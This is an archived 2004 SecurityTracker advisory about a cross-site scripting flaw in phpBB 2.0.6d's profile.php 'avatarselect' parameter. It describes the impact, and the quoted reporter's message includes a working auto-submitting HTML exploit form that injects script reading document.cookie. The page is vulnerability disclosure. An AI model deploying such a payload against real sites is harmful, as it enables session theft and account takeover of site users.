Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
phpBB 'profile.php' Input Validation Flaw in 'avatarselect' Permits Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1009519
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 23 2004
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Exploit Included: Yes
|
Version(s): 2.0.6d
|
Description: An input validation vulnerability was reported in phpBB in 'profile.php'. A remote user can conduct cross-site scripting attacks.
Cheng Peng Su reported that the 'profile.php' script does not properly validate user-supplied input in the 'avatarselect' variable
with the 'Show Gallery' function.
A remote user can create a specially crafted POST request that, when submitted by a target
user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running
the phpBB software and will run in the security context of that site. As a result, the code will be able to access the target user's
cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user
via web form to the site, or take actions on the site acting as the target user.
A demonstration exploit form is provided in
the Source Message.
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
phpBB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as
the target user.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.phpbb.com/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Cheng Peng Su <apple_soup@msn.com>
|
Message History:
None.
|
Source Message Contents
|
Date: 21 Mar 2004 03:36:19 -0000
From: Cheng Peng Su <apple_soup@msn.com>
Subject: phpBB profile.php Cross Site Scripting Vulnerability
|
#####################################################################
Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
Release Date : Mar 21,2004
Application : phpBB
Version : phpBB 2.0.6d or others?
Platform : PHP
Vendor URL : http://www.phpbb.com/
Author : Cheng Peng Su(apple_soup_at_msn.com)
#####################################################################
Proof of Conecpt:
This vuln is in profile.php,when you click [Show Gallery],phpBB
will show you Avatar gallery,asking you to choose one for yourself.
The hole is in the form,after submitting phpBB will use the value of
"avatarselect" as the path of the gallery directly,without filtering
any illegal characters.
Exploit:
-------------exploit.htm--------------
<form name='f' action="http://site/profile.php?mode=editprofile" method="post">
<input name="avatarselect" value='" ><script>alert(document.cook
ie)</script>'>
<input type="submit" name="submitavatar" value="Select avatar">
</form>
<script>
window.onload=function()
{
document.all.submitavatar.click();
}
</script>
---------------end-------------------
Contact:
Cheng Peng Su
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China(430072)
apple_soup_at_msn.com
|
|
Go to the Top of This SecurityTracker Archive Page
|
